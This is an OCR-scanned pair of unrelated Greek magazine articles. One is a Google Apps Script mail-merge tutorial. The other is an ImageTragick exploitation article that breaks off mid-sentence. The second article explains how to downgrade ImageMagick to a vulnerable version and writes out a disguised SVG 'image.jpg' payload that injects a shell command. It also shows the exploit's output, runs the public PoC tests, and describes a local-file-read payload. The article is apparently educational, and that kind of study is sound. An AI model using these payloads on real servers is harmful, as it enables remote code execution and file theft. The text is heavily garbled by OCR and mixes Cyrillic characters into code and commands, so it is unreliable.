γραμματισμού, αν αντί για éva κελί ορίσουµε τις συντεταγμένες που περικλείουν 
ένα εύρος κελιών, και συγκεκριµένα τη θέση του αριστερότερου άνω και του δεξιό- 
τερου κάτω κελιού, рас επιστρέφεται ÉVA αντικείµενο που αντιπροσωπεύει όχι ένα 
μεμονωμένο κελί, αλλά ολόκληρο το εύρος που περικλείεται στις συντεταγμένες 
που καθορίσαµε. Αυτές ξεκινούν από το σηµείο που αρχίζουν τα δεδοµένα των TE- 
δίων µας (δηλαδή апо τη γραμμή 5) κι εκτείνονται αριστερά μέχρι εκεἰ που τελειώ- 
νουν οι μεταβλητές που ορίσαµε. Προσέξτε оті үа va βρούμε το τελευταίο κελί του 
φύλλου µας καλούμε τη getMaxRows, η οποία επιστρέφει το μέγιστο πλήθος των 
κελιών που έχει το φύλλο εργασίας μας. 


Πολύ λογικά Ө' αναρωτιέστε για το πώς γνωρίζουμε αυτές τις συναρτήσεις. Τέ- 
τοιες μέρες που εἰχαμε δεν µας ήλθε κάποια επιφοίτηση. Απλά συμβουλευθή- 
каре το εγχειρίδιο που προσφέρει η Google για το Apps Scripting, στη διεύθυνση 
https://developers.google.com/apps-script/reference. Σ' αυτό σας παραπέµπουµε 
αν θέλετε να μελετήσετε όλες τις λεπτομέρειες των συναρτήσεων που υπάρχουν 
στον κώδικα του script µας. 


Συνεχίζουμε λοιπόν ре τις γραμμές 13 και 14, στις οποίες παίρνουμε το θέμα και το 
κείµενο του μηνύματός µας, όπως τα ορίσαµε στα αντίστοιχα κελιά. Στη γραμμή 16 
καλούμε τη δική µας συνάρτηση getRows, στην οποία περνάμε το αντικείµενο του 
τρέχοντος φύλλου εργασίας και του επιλεγμένου εύρους. Μέσα σε αυτήν, δηµιουρ- 
γούμε τη μεταβλητή vars στην οποία περνάμε σε ἕναν πίνακα τα ονόματα των TE- 
δίων µας. Πώς τα βρίσκουμε; Μα φυσικά, βάσει των συντεταγμένων του range των 
δεδομένων µας. Προς το τέλος της getRows γίνεται η κλήση της getRecords, στην 
οποία περνάμε ἑναν πολυδιάστατο πίνακα µε τις τιµές του εύρους των δεδοµένων 
μας και τον πίνακα µε τους τίτλους των πεδίων. 


Н συνάρτηση деїКесогаѕ διατρέχει όλον τον πίνακα των τιμών, σε μήκος και σε πλά- 
τος, και δημιουργεί ένα νέο διδιάστατο πίνακα µε όλες τις µη κενές γραμμές του 
εύρους, κι ορίζοντας ως κλειδιά των στοιχείων κάθε γραμμής τους τίτλους των 
πεδίων µας. Н συνάρτηση getRecords στο τέλος της επιστρέφει τον πίνακα αυτόν, о 
οποίος μάλιστα αποτελεί και την επιστρεφόµενη τιμή της getRows. 
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Πίσω στη send τώρα, ξεκινάμε éva βρόχο που διατρέχει μία προς μία τις γραμμές 
του πίνακα των δεδομένων µας. Κάθε γραμμή του πίνακα περνάει στη μεταβλητή 
гом. Να θυμίσουμε ότι ἔτσι όπως δομήσαμε τον πίνακα, η κάθε γραμμή του αποτελεί 
ἑναν µονοδιάστατο πίνακα µε κλειδιά τους τίτλους των πεδίων µας. 


Την κύρια δουλειά тпс συγχώνευσης, της αντικατάστασης δηλαδή των ορισμώντων 
πεδίων µας µέσα στο κείµενο του μηνύματος ре τις τιμές των αντίστοιχων κλει- 
διών τις εκάστοτε γραμμής, αναλαμβάνει η συνάρτηση mergeBody. Σ' αυτή περνάμε 
το κείμενο του μηνύματος και τον πίνακα των στοιχείων της τρέχουσας γραμμής. Το 
σώμα της συνάρτησης ξεκινάει στη γραμμή 54 και, όπως βλέπετε, κάνουμε χρήση 
των κανονικών εκφράσεων προκειµένου να πάρουμε σε έναν πίνακα όλα τα µετα- 
βλητά πεδία που έχουν οριστεί µέσα στο κείμενό µας, υπό τη µορφή ὁ{ όνομα πε- 
6100"). Στη συνέχεια, µε τη βοήθεια ενός βρόχου αντικαθιστούμε στο κείμενό µας 
τον προαναφερθέντα ορισμό του εκάστοτε πεδίου µε την τιμή που αντιστοιχεί στο 
ομότιτλο κλειδί του πίνακα (γραμμής) δεδοµένων. Για να έχουµε μάλιστα τον τίτλο 
του πεδίου, αποκόπτουµε τα αρχικά ${" καθώς και τα τελικά "} тоо χρησιμοποιούμε 
για τον ορισμό του εντός του κειµένου. Στη συνέχεια επιστρέφουµε το συγχωνευ- 
μένο κείμενο, το οποίο κι αποστέλλουµε µε email µε τη βοήθεια της συνάρτησης 
ѕепдЕтаі του αντικειμένου MailApp. Προσέξτε ότι για την εκάστοτε διεύθυνση 
email χρησιμοποιούμε το κλειδί "email" апо τον πίνακα των στοιχείων της τρέχου- 
σας γραμμῆς. Αυτό συνεπάγεται ὁτι, όπως και τα πεδία, θα πρέπει να συμφωνεί ο 
τίτλος της στήλης που δημιουργήσαμε κατά το στήσιμο του φύλλου εργασίας μας, 
µε αυτόν που ορίζουμε µέσα στη συνάρτηση ("етаі!", στην προκειμένη περίπτωση). 


Μετά την ολοκλήρωση των αποστολών εμφανίζουμε στο χρήστη ένα ενημερωτικό 
μήνυμα, σχετικά ре την ολοκλήρωση και το πλήθος των απεσταλµένων μηνυμάτων. 
Πα να γίνει αυτό, χρησιμοποιούμε τη συνάρτηση msgBox του αντικειμένου Browser. 


Αρχείο Επεξεργασία Προβολή Εισαγωγή Μορφή Δεδομένα Ἐργαλεία Πρόσθετα Βοήθεια Συγχώνευση email Όλες o! 


Я Μια προσφορά που беу µπορείς να αρνηθείς 


Κείμενο Αγαπητέ $"ОМОМА"), 
το περιοδικό µας κάνει υπερπρασφορές στοιις πιστούς του αναγνώστες 


1 εσύ φυσικά είσαι ένας από αὐτοῦκ! 


Πα να 
δώσε 


οιήσεις την προσφορά πήγανε στη σελίδα παραγγελίας και 
κου! προσφοράς τον Κωδικό Φ[ ΚΩΔΙΚΟΣ 
Καλή ανάγνωση! 
з Μειαβλητές 3 
4 етай ONOMA ΚΩΔΙΚΟΣ 
5 реїоз@аһс.ху: Πέιρο тус324з 
5. takis@hotmail.gr Τάκη 1005sdf 
7  sakis@company Σάκη χοζάήτᾳ 
5 


Το φύλλο εργασίας µας, στημένο 

και πανέτοιµο να µας επιτρέψει να 
4 T προχωρήσουμε στην πολυπόθητη 
ШШЕ μα συγχώνευση αλληλογραφίας. 


БЕ ИЕЛЕ 
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Πα την εκτέλεση του script θα πρέπει είτε να πατήσουµε τη σχετική επιλογή апо TO 
μενού που φτιάξαμε στο φύλλο εργασίας, είτε από το περιβάλλον του Script Editor 
να паре στο μενού "Εκτέλεση" και να επιλέξουμε τη συνάρτηση "send". Για αρχή επι- 
λέγουμε τη δεύτερη λύση, έτσι шоте να δούµε αν όλα λειτουργούν σωστά, δίχως 
να χρειάζονται περαιτέρω αλλαγές και έλεγχοι, προτού αποφασίσουµε να εγκατα- 
λείψουμε το περιβάλλον του Script Editor. Μάλιστα, επειδή είναι η πρώτη φορά που 
εκτελούμε τον κωδικατου 5οήρῖ,θαπρέπει να παραχωρήσουµμετις σχετικές άδειες 
апо το λογαριασμό µας (στη Google), στο παράθυρο προτροπής που θα εμφανιστεί. 
Με βάση τα αντικείµενα апо το Google АРІ που χρησιµοποιήσαμε, µας ζητείται να 
επιτρέψουμε ото script тпу πρόσβαση στα υπολογιστικά φύλλα του drive µας, καθώς 
και την αποστολή emails. Φυσικά συναινούµε και προχωράμε στην πρώτη εκτέλεση 
του κώδικά µας. 


деќаМегде 
Αρχείο Επεξεργασία Προβολή Εκτέλεση Δημοσίευση Πόροι Βοήθεια 


ж = ы εν [©] Επιλογή λειτουργίας. 
В Κώδικας ας - Κώδικας ᾳ5 


1 function send(){ 
2 var spread = SpreadsheetApp. getActiveSpreadsheet(); 
var sheet = spread.getSheets()[0]; 
var numVars = sheet. getRange("B3").getValue(); 
var range = sheet.getRange(5, 1, sheet.getMaxRows() - 1, numVars); 
var subject = sheet. getRange("B1").getValue(); 
var body = sheet. getRange("B2").getValue(); 


records = getRows(sheet, range); 
for (var i = 0; i < records. length; ++i) { 
var row = records[i]; 
var mergedBody = mergeBody(body, row); 
MailApp.sendEmail(row.email, subject, mergedBody); 


ΓΕ 


8 function getRows(sheet, range){ x 
9 varsRowIĪndex = гапе. веВомІпбех() - 1; 

var питСо1штпз = range.getEndColumn() — range.getColumn() + Απαπεπαι εξουσιοδότηση 

var varsRange = sheet.getRange(varsRowIndex, гапе. е+Со1штг 

var vars = varsRange.getValues()[0]; The application "deltaMerge" needs authorization to run. 


var records = getRecords(range.getValues(), vars); 
return records ; 


26 Έλεγχος δικαιωμάτων. Ακύρωση 
7 function getRecords(data, keys){ 
var records = []; 
for(var i = 0; i < data.length; ++i){ 
var record = {}; 
ue; 


<'data[i]. length; ++j){ 
Барате. 


Н εκτέλεση του script µας απαιτεί τη σχετική 
εξουσιοδότηση από πλευράς χρήστη. 


с ` 
@ Απηµα ἄδειας - Mozilla Firefox Erm] 


Ὁ @ | https://accounts.google.com/o/oauth2/auth?client_id=109400737286-tf6ljoh65q931gmv9bi5nkfohiqrı 


Google petros.kyladitis@gmail.com ~ 


~ Н εφαρµογή deltaMerge Ва ήθελε να: 


Προβολή και διαχείριση των υπολογιστικών φύλλων σας 
| στο Google Drive 


8 Αποστολή μηνυμάτων ηλεκτρονικού ταχυδρομείου шс ο 
ἴδιος ο χρήστης 


Κάνοντας κλικ στην επιλογή "Να єтттрёттєтаї”, θα εττπρέψετε σε αυτήν την εφαρµογή 
και στην Google να χρησιμοποιούν τα στοιχεία σας σύμφωνα µε τους ανήστοιχους 
όρους τταροχῆς υττηρεσκῶν και τις ττολπικές αττορρήτου. Μττορείτε να αλλάξετε αυτό 
ко ἄλλα δικαιώματα λογαριασμού avó πάσα σπγμή 


Ὃ δα Οι άδειες πρόσβασης που καλούμαστε να 
παραχωρήσουµε ото script λαμβάνονται υπ’ 
όψιν από τα αντικείμενα του Google АРІ που 
έχουµε χρησιμοποιήσει. 
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Δίχως καμιά δυσάρεστη έκπληξη η συγχώνευση αλληλογραφίας στις δοκιμαστικές 
διευθύνσεις email που δώσαμε δούλεψε απροβλημάτιστα. Στο σημείο αυτό να ava- 
φέρουμε оті για την αποφυγή φαινομένων spamming δεν μπορούμε να στείλουμε 
περισσότερα апо 200 emails εντός εικοσιτετραώρου. Κλείνοντας τώρα την KAP- 
тела του Script Editor περνάμε πίσω, σε αυτή µε το ανοιχτό φύλλο εργασίας µας, 
στο οποίο αν δεν έχει εμφανιστεί το μενού που προσθέσαµε, το κλείνουμε και то 
ξανανοίγουµε µέσα από το Google Drive µας. Μια δοκιμαστική αποστολή µέσα апо то 
μενού µας αυτή τη φορά, πήγε κατ’ ευχήν. Πα οποιεσδήποτε αλλαγές στον κώδικα, 
ο Script Editor είναι εκεί που τον αφήσαμε (τον ανοίγουμε και πάλι ATÓ τη σχετική 
επιλογή του μενού "Εργαλεία". 


Έργο χωρίς τίτλο 
Αρχείο Επεξεργασία Προβολή Εκτέλεση Δημοσίευση Πόροι Βοήθεια 


ы A (©) » ж myFunction 


\й 


В Κώδικας 45 ” Κώδικας ᾳ5 
function туҒипсёїіоп() { 


} 


оо Ρο 


Το περιβάλλον εργασίας του Script Editor είναι λιτό, δίνοντας 
έμφαση στην επεξεργασία του κώδικα. Πίσω πάντως από την 
φαινομενική απλότητά του, ο Editor κρύβει έναν πανίσχυρο Debugger. 
Αν αποφασίσετε να τον αξιοποιήσετε, είμαστε σίγουροι πως θα 
ενθουσιαστείτε. 


Πα µια ακόµη фора ομολογούμε πως εἰμαστε ενθουσιασµένοι, αφού προσδώσα- 
µε µια αγαπημένη και χρήσιμη δυνατότητα σε éva προϊόν που δεν την υποστηρίζει 
εγγενώς. Επιπρόσθετα, εἰχαμε τη χαρά να μελετήσουμε τον αρκετά ισχυρό Script 
Editor της Google, σε συνδυασμό µε το παρεχόµενο АРІ για τα προϊόντα της εταιρεί- 
ας. Δεν σας κρύβουμε ότι το όλο πρότζεκτ µας έβαλε σε ευχάριστες σκέψεις και 
ήδη σχεδιάζουμε το επόμενο cloud-oriented project µας. 
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Συγχώνευση Αλληλογραφίας στο Gmail 


ШО Outlook.com 


Φάκελοι 
Εισερχόµενα 
Ανεπιθύμητη αλλ/φία 
Πρόχειρα 
Απεσταλμένα 
Διαγραμμένα 
Απεσταλμένα 


Νέος φάκελος 


(4) Δημιουργία Απάντηση!" Διαγραφή Ару Ανεπιθύμητη αλληλογραφία |" 


Μια προσφορά που δεν μπορείς να αρνηθείς 


Petros Kyladitis 9:12 пр 
Προς: реігоѕ@абс.хуг є 


Αγαπητέ Πέτρο, 
το περιοδικό µας κάνει υπερπροσφορές στους πιστούς του αναγνώστες 
κι εσύ φυσικά είσαι ένας απὀ αυτούς! 


Για να αξιοποιήσεις την προσφορά πήγαινε στη σελίδα παραγγελίας και 
δώσε στο κουτί προσφοράς τον κωδικό 2ус3245 


Καλή ανάγνωση! 


© 2016 Microsoft Όροι Προστασία προσωπικών δεδοµένων ka cookies Προγραμματιστές Ελληνικά 


О παραλήπτης έλαβε ένα εντελώς προσωποποιηµένο μήνυμα. Ακριβώς ό,τι θέλαμε. Ωραία. 
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Skill: Advanced 
Tags: ImageMagick, ImageTragick, Remote Code Execution, weaponization 
exploitation, Proof of Concept 


ImageTragick: 
Οπλισμός, Επιθέσεις, 
Προστασία 


Μάθαμε για το πανταχού παρόν ImageMagick κι εξηγήσαμε σε τι οφείλεται 
η πρόσφατα ανακαλυφθείσα αδυναμία του. Είναι ώρα να δούµε πώς ένας 
επιτιθέμενος εκμεταλλεύεται τις αδυναμίες του πακέτου. Στη συνέχεια 
θα εξηγήσουμε πώς οι μηχανικοί διορθώνουν προβλήµατα σαν αυτά του 

ImageMagick, παίρνοντας για λίγο το ρόλο ενός ОА engineer. 


του Πάνου Γεωργιάδη 


Από τη στιγµή που το ImageMagick αποτυγχάνει να ελέγχει επαρκώς та URLS προς 
εικόνες, επόμενο βήμα για ἕναν blackhat είναι η κατασκευή µιας εικόνας µέσα στην 
οποία θα περιλαμβάνεται κώδικας για εκτέλεση από υποψήφια µηχανήµατα-στό- 
χους. Όταν η συγκεκριμένη εικόνα θα ανεβαίνει σε server ο οποίος χρησιμοποιεί 
ευπαθή έκδοση του ImageMagick, τότε о κακόβουλος κώδικας θα εκτελείται. 


Πώς να κάνω το σύστημά µου ευπαθές; 


Κατά την παρουσίασή µας, το πιθανότερο εἰναι να δοκιμάζετε όλα όσα δείχνου- 
µε σε δικὀ σας σύστημα. Κάπως έτσι επιτυγχάνεται η γεφύρωση της θεωρίας 
ре την πράξη, οπότε η γνώση δεν είναι απλά περαστική αλλά γίνεται κτήμα. Εν 
τροκειµένω, το θέµα εἰναι πως το σύστημά σας πιθανώς να ΄ναι ενημερωμένο 
και συνεπώς προστατευμένο ως προς то ІтадетТгадіск. Τι γίνεται σε µια τέτοια 
ερίπτωση; Μια λύση εἰναι να εργαζόµαστε σε VM, το οποίο σκόπιμα” δεν εἰναι 
ενημερωμένο. Εναλλακτικά, καταφεύγοντας στο σύστηµα package management 
της εκάστοτε διανομής Linux, είναι δυνατόν να "υποβαθμίσουμε3 τα πακέτα του 
ImageMagick φροντίζοντας ἐτσι WOTE να έχουµε ευπαθείς εκδόσεις. 


Είναι βέβαια απαραίτητο να γνωρίζουμε ποιες εκδόσεις εἰναι ευπαθείς καθώς 
κι апо ποια έκδοση και µετά τα προβλήµατα έχουν αντιμετωπιστεί. Ειδικά στο 
openSUSE Leap, προκειµένου να έχουµε ἐκδοση του ImageMagick ue όλα та bugs 
του Ітадетгадіск, ξεκινάμε σημειώνοντας τις ακριβείς εκδόσεις των εγκατεστη- 
μένων πακέτων: 
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ImageTragick: Οπλισμός, Επιθέσεις, Προστασία 


рапоѕ@оһћѕиѕе:~> zypper se Magick | grep "^i" 


i | ImageMagick | Viewer and... | package 

i | 110Маріск++-6 016-3 | C++ Interface... - runtime library | package 
i | libMagickCore-6_Q016-1 | Viewer and... - runtime library | 
package 

i | libMagickwand-6_Q16-1 | Viewer and... - runtime library | 
package 


Μετά απομακρύνουµε τα σχετικά πακέτα: 


рапоѕ@оһћѕиѕе:~> sudo zypper -n гт ImageMagick 110Маріск++-6 016-3 
110МаріскСоге-6 016-1 110МаріскћМапа-6_ 016-1 


Είναι σηµαντικὀ να διαγράψουµε και τον κατάλογο /εἴο/ΙπιαοεΜαοίοκ-6 016-1: 
рапоѕ@оһћѕиѕе:~> sudo гт -fr /etc/ImageMagick* 


Στη συνέχεια εγκαθιστούµε παλαιότερη εκδοση του ImageMagick, για την οποία 
γνωρίζουμε ότι εἶναι ευπαθής: 


рапоѕ@оһћѕиѕе:~> sudo Ζγρρεγ -n іп --oldpackage ІтареМаріск-6.8.8.1-6.1 
panos@ohsuse:~> sudo zypper -n іп --oldpackage 116Маріск++-6 016-3-6.8.8.1- 
6.1 

рапоѕ@оһћѕиѕе:~> sudo zypper -n іп --oldpackage 110МаріскСоге-6 016-1-6.8.8.1- 
6.1 


panos@ohsuse:~> sudo zypper -n іп --о1араскаре 1106МаріскћМапа-6_016-1-6.8.8.1- 
6.1 


Στο σηµείο αυτό το openSUSE µας εἰναι ευπαθές και μπορούμε να προχωρήσουμε 
στους πειραματισμούς µας. 


Image weaponization 


Στο άρθρο που ξεκινά από τη σελίδα 30 εἰδαμε έναν τρόπο κατά τον οποίο το 
ImageMagick υποχρεώνεται να εκτελέσει κώδικα, ο οποίος δεν θα έπρεπε VA EKTE- 
λείται. Είναι ώρα να βασιστούµε στο ΟΝΕ-20Ί6-3714 και, καθαρά για εκπαιδευτι- 
κούς λόγους, να φτιάξουμε ένα exploit. 


Έχουμε ήδη παρουσιάσει έναν τρόπο για την παράτυπη εκτέλεση κώδικα, οπότε 
τωραλέμενα κάνουμε κάτι πιο επικίνδυνο:να κατασκευάσουµε µια κακόβουλη εικό- 
να. Па тоос λόγους που εξηγήσαµε ото πρὠτο µέρος της μίνι σειράς µας (βλ. άρθρο 
σελ. 14), θα δημιουργήσουμε µια εικόνα τύπου SVG. Όπως θα δούμε σε λίγο, θα είναι 
εύκολο να της προσθέσουμε κώδικα. 
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Με τον αγαπημένο µας editor (vim ἡ папо;) δημιουργούμε то νέο αρχείο ονόματι 
image.jpg. Πληκτρολογούμε το ακόλουθο περιεχόμενο 


push graphic-context 


viewbox 0 0 640 480 
fill 'url(https://i.imgur.com/u68Vakj.jpg"|ls "-al)' 
pop graphic-context 


Προφανώς, το νέο αρχείο δεν εἶναι JPEG αλλά SVG. Αποφασίζουµε όµως και δεν 
χρησιμοποιούμε την πραγματική κατάληξη που του αρμόζει, αφού πιστεύουμε ότι 
θα τραβούσε ευκολότερατα βλέμματα. Μόλις λοιπόν οπλίσαµε την εικόνα µας, опо- 
τε ας κάνουμε µια δοκιμή για να δούμε αν "λειτουργεί. 


panos@ohsuse:~/test> convert image.jpg image.png 


total 8 

drwxr-xr-x 2 
drwxr-xr-x 23 
-rw-r--r-- 1 
-rw-r--r-- 1 
-rw-r--r-- 1 
-rw-r--r-- 1 
-rw-r--r-- 1 
1 


-rW-r--r-- 


panos 
panos 
panos 
panos 
panos 
panos 
panos 
panos 


users 
иѕегѕ 
users 
users 
иѕегѕ 
users 
users 
users 


88 
4096 


116 


May 
May 
May 
May 
May 
May 
May 
May 


20 
19 
18 
18 
18 
18 
18 
20 


ΠΟΙ ο 

ΠΒ] οο 

:53 #1е1 

:53 #1е2 

:53 file3 

:53 #1е4 

:53 {165 

:55 image.jpg 


convert: unrecognized color `ћїрѕ://1. ітриг. сот/иб8Макј. јрв" |15 "-а1' @ 
warning/color .c/GetColorCompliance/947. 


convert: unable to open image `/tmp/magick-4656g5kjse1a0ujqą': No such file ог 
directory @ error/blob.c/OpenBlob/2643. 


convert: unable to open file `/tmp/magick-4656g5kjse1la0ujq': No such file or 
directory @ error/constitute.c/ReadImage/594. 


convert: non-conforming drawing primitive definition `fill' @ еггог/дгам. с/ 
DrawImage/3178. 


panos@ohsuse:~/test> ls -la 


total 12 

drwxr-xr-x 2 
drwxr-xr-x 23 
-rw-r--r-- 1 
-rw-r--r-- 1 
-rw-r--r-- 1 
-rw-r--r-- 1 
-rw-r--r-- 1 
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panos 
panos 
panos 
panos 
panos 
panos 
panos 


users 
иѕегѕ 
users 
users 
иѕегѕ 
иѕегѕ 
users 


105 
4096 
0 


0 
0 
0 
0 


May 
May 
May 
May 
May 
May 
May 


20 
19 
18 
18 
18 
18 
18 


ας] ο 

109° 

{53 #1е1 
{53 #1е2 
{53 Π163 
{53 #1е4 
{53 file5 


ImageTragick: Οπλισμός, Επιθέσεις, Προστασία 


-rw-r--r-- 1 panos users 116 Мау 20 09:55 image.jpg 


panos@ohsuse:~/test> 


Άψογα, το "Is -la" εκτελέστηκε, ενω δημιουργήθηκε και το αρχείο image.png. Φυσικά, 
σε σενάριο όπου έχουμε έναν πραγματικά κακόβουλο χρήστη, δεν εκτελείται κάτι 
τόσο αθώο боо то "ls -la". Επίσης, αποτρέπεται και η έξοδος των μηνυμάτων λάθους. 
Τέλος, όπως θα μπορέσετε να δαπιστώσετε, στο παράδειγμά µας το αρχείο image. 
png είναι λευκό (Στ.Ε. Like, literally). Σε ρεαλιστικά σενάρια οι επιτιθέµενοι επιθυ- 
μούν να µην κάνουν φανερή τη δράση ή/και την παρουσία τους, γεγονός που στην 
περίπτωσή µας σημαίνει ότι "και" κακόβουλος κώδικας εκτελείται "και" οι όποιες 


File Edit View Search Terminal Help 


panos@ohsuse:~/test> cat imag 
push graphic-context 
viewbox © Ө 640 480 
fill 'url(https://i.imgur.com/u68Vakj .јре" |15 "-al)' 
pop graphic-context 
panos@ohsuse:~/test> 
panos@ohsuse:~/test> di: 
total 8 
drwxr-xr-x 2 panos users 20 
drwxr-xr-x 23 panos users 19 5 
1 panos users 18 ` filel 
1 panos users 18 5 file2 
1 panos users 18 Ξ file3 
1 panos users 18 т file4 
1 panos users 18 3 files 
1 panos users 20 3 image.jpg 
//\.imgur .com/u68Vakj.jpg"|ls "-al' @ warning/color .c/GetColorCompliance/947. 


ImageMagick: image.jpg 


Pan Icon 


To CVE-2016-3714, για ta delegations του ImagaMagick, δεν 
εκδηλώνεται μόνο µε το προγραμματάκι convert. Εδώ το βλέπουμε 
και µέσα από το εργαλείο display, επίσης του ImageMagick. 
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μετατροπές επιτυγχάνονται. Παρεμπιπτόντως, αν то bug που εξετάζουμε σάς pai- 
νεται ενδιαφέρον και θέλετε να παίξετε περισσότερο, έχετε υπόψη ότι έχει ήδη 
κυκλοφορήσει module για το Metasploit (http://bit.ly/msfimgtragick). 


Proof of Concept και τροποποιήσεις 


H λίστα µε та κενά ασφαλείας που ολοκληρώνουν το πακέτο ονόματι ImageTragick, 
εἶναι η ακόλουθη: 


ΟΝΕ-2016-3714 - Insufficient shell characters filtering 
CVE-2016-3715 - File Deletion 

CVE-2016-3716 - File Moving 

CVE-2016-3717 - Local File Read 

CVE-2016-3718 - SSRF (Server-Side Request Forgery) 


Αν έχετε διάθεση να μάθετε περισσότερα για τις συγκεκριμένες αδυναμίες – 
και κάτι µας λέει πως ἐχετε-, ξεκινήστε апо την ακόλουθη σελίδα του Pastebin: 
http://pastebin.com/Gynz2XRG. Εκεί θα βρείτε τα πιο γνωστά Security Advisories, 
апо τα οποία μάθαμε κι εμείς για το ImageTragick. Να σημειώσουμε ότι η επίσημη 
ανακοίνωση των developers του ImageMagick βρίσκεται στο http://bit.ly/grmgofan. 
Σας προτείνουμε να κάνετε τουλάχιστον µια ανάγνωση στα προαναφερθέντα URLs, 
ώστε να σχηµατίσετε μία πιο ολοκληρωμένη εικόνα για το ІтадеТгадіск. Μετά άλ- 
λωστε τα όσα συζητήσαµε και παρουσιάσαµε, θεωρούμε πως έχετε τις γνώσεις να 
προσεγγίσετε καλύτερα τα σχετικά κείµενα και να βγάλετε τα бука σας συμπερά- 
ората. 


Όλα τα παραπάνω υπάρχουν διαθέσιµα και σε PoC (Proof Of Concept), στο 
Github: https://github.com/ImageTragick/PoCs (για το documentation δείτε στο 
https://imagetragick.com). Σας προτείνουμε να κατεβάσετε τα Ροῦς και να τα δοκι- 
μάσετε. Αυτό γίνεται πολύ πιο εύκολα απ боо ακούγεται. Το µόνο που χρειαζόσαστε 
για να ξεκινήσετε είναι το εργαλείο дії. Δείτε: 


panos@ohsuse:~/test> git clone https ://github.com/ImageTragick/PoCs 
Conine 1πο "Ρος"... 

remote: Counting objects: 56, done. 

remote: Compressing objects: 100% (3/3), done. 

remote: Total 56 (delta 0), reused 0 (delta 0), pack-reused 53 
Unpacking objects: 100% (56/56), done. 

Checking connectivity... done. 


Προκειμένου να εκτελέσετε та РоСѕ μεταβείτε στον ομώνυμο κατάλογο ("cd PoCs") 
και τρέξτε TO script που θα βρείτε εκεί ("./test.sh"). 
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ImageTragick: Οπλισμός, Επιθέσεις, Προστασία 


File Edit View Search Terminal Help 
panos@ohsuse:~/test> git clone ht {github .com/ImageTragick/PoCs 
Cloning into 'PoCs'... 
remote: Counting objects: 56, done. 
remote: Compressing objects: 100% (3/3), done. 
remote: Total 56 (delta ©), reused © (delta ©), pack-reused 53 
Unpacking objects: 100% (56/56), done. 
Checking connectivity... done. 
panos@ohsuse:~/test> cd PoCs 
panos@ohsuse:~/test/PoCs> ./test.sh 
ing read 


g delete 
http with local port: 44 


g http with nonce: 3ef5b 


testing 
UNSAFE 


panos@ohsuse:~/test/PoCs> 


Το σύστηµα των δοκιμών µας μόνο ασφαλές δεν είναι, ως προς τα 
προβλήματα του ІтадеТгадіск :/ 


Όπως βλέπετε και στο σχετικό screenshot, το σὐστημά µας κάθε άλλο παρά aoga- 
λές θεωρείται. Βέβαια αυτό εἰναι κάτι που το γνωρίζουμε, καθώς σκόπιµα δεν έχου- 
µε αναβαθμίσει το ImageMagick στο openSUSE µας. Το πραγματικά ενδιαφέρον με 
το PoC που κατεβάσαμε, εἶναι ότι έχουμε ελεύθερη πρόσβαση στον κώδικά του. 
Αρκεί κάποιος να έχει βασικές γνώσεις προγραμματισμού -ὀχι κατ’ ανάγκη να γνω- 
рсе. BASH scripting- και θα κατανοήσει εὐκολα τι συμβαίνει. 

Ας δούµε πώς εἰναι δυνατή η αξιοποίηση του ΟΝΕ-2016-3717 (Local File Read). Το 
σχετικό bug βασίζεται στη δυνατότητα που έχει το ImageMagick να χρησιμοποιεί ως 
εἰσοδό του, την έξοδο κάποιας άλλης εντολής. Για παράδειγµα, δείχνουμε πώς το 
output της εντολής ifconfig γίνεται το περιεχόµενο µιας εικόνας PNG: 


panos@ohsuse:~/test/PoCs> / 


Па τη συνέχεια ανοίγουμε το αρχείο test.sh και βρίσκουμε το κομμάτι του κώδικα 
που σχετίζεται µε то "testing read": 
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File Edit View 


panos@ohsuse: 
panos@ohsuse: 
panos@ohsuse: 
panos@ohsuse: 


Search Terminal 


~/test/PoCs> 
~/test/PoCs> 
~/test/PoCs> 
~/test/PoCs> 


VHA@KER 


Help 


in/ifconfig convert label:@- output. 


output. png 


ImageMagick: завы 


Й 0 
inet а0аг:192 168.10.139 Всазг1! 2. 168. 10. 255 Mask:255. 255.255.0 
їпеїб addr: fe80::20c:29fffefa:d3a0/64 Scope:Link 

UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 

RX packets:37027 errors:0 dropped:0 overruns:0 їгате:0 

TX packets:7917 errors:0 «торро омеггип:0 саггіег:0 


collisions:0 ο. 11000 


RX руіеѕ:18754018 (17.8 Mb) ТХ руіеѕ:783293 (764.9 Kb) 
Link епсар:1 оса! Loopback 

inet а0г:127.0.0.1 Маѕк:255.0.0.0 

їпеїб addr: ::1/128 Scope:Host 

UP LOOPBACK RUNNING МТ:65536 Меїпс:1 

RX packets:146 errors:0 dropped:0 overruns:0 frame :0 

TX packets:146 errors:0 ἐν 10 overruns:0 carrier:0 
collisions:0 txqueuelen 

RX bytes:10940 (10.6 TKD) TX bytes:10940 (10.6 Kb) 


To Local File Read vulnerability βασίζεται στην ικανότητα του ImageMagick 
να δέχεται στην εἰσοδό του την έξοδο κάποιου άλλου προγράµµατος. Στο 
παράδειγµα βλέπουμε τη δηµιουργία μίας εικόνας PNG, η οποία απεικονίζει 
την ἐξοδο του εργαλείου ifconfig. 


echo "testing read" 


echo "Hello World" > readme 
#echo "44888 convert 444444" 


convert read.jpg readme.png 2>/dev/null 1>/dev/null 


#есһо "#+ННННННННННННННННННҤ"' 


if [ ! -e readme.png ] 


then 


echo "SAFE" 


else 


echo "UNSAFE" 
rm readme .png 


fi 
rm readme 


echo 


88 


png 
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Н λογική εδω εἰναι ότι έχουµε µια κακόβουλη εικόνα, τη read.jpg, η οποία είναι φτιαγ- 
μένη για να εκμεταλλευτεί το συγκεκριµένο κενό ασφαλείας (δηλαδή το Local File 
read). То read.jpg δεν είναι πραγµατικό αρχείο JPEG, αλλά ένα SVG µε то ακόλουθο 
περιεχόµενο: 


panos@ohsuse:~/test/PoCs> cat геай.]рр 
push graphic-context 

viewbox 0 0 640 480 

image over 0,0 0,0 'label:@readme' 
popgraphic-context 


Σύμφωνα HE το σχετικὀ advisory το μυστικό κρύβεται στο ψεύτικο πρωτόκολλο TOU 
ImageMagick ονόματι "readme", το οποίο στην ουσία διαβάζει το περιεχόµενο του 
ομώνυμου αρχείου. Πα να έχει νόηµα το συγκεκριμένο test, προὐποτίθεται η παρου- 
σία του readme. Για αυτό, αν παρατηρήσετε µέσα στο test.sh, θα δείτε την ακόλουθη 


γραμμή: 
echo "Hello World" > readme 


Αν λοιπόν το exploit λειτουργήσει θα δημιουργηθεί µια εικόνα µε буора readme.png, 
η οποία θα αποτελεί ένα screenshot апо το αποτέλεσµα της εντολής "cat readme" 
(χωρίς τα εισαγωγικά). Φανταστείτε τώρα ότι ένας κακόβουλος χρήστης θέλει να 
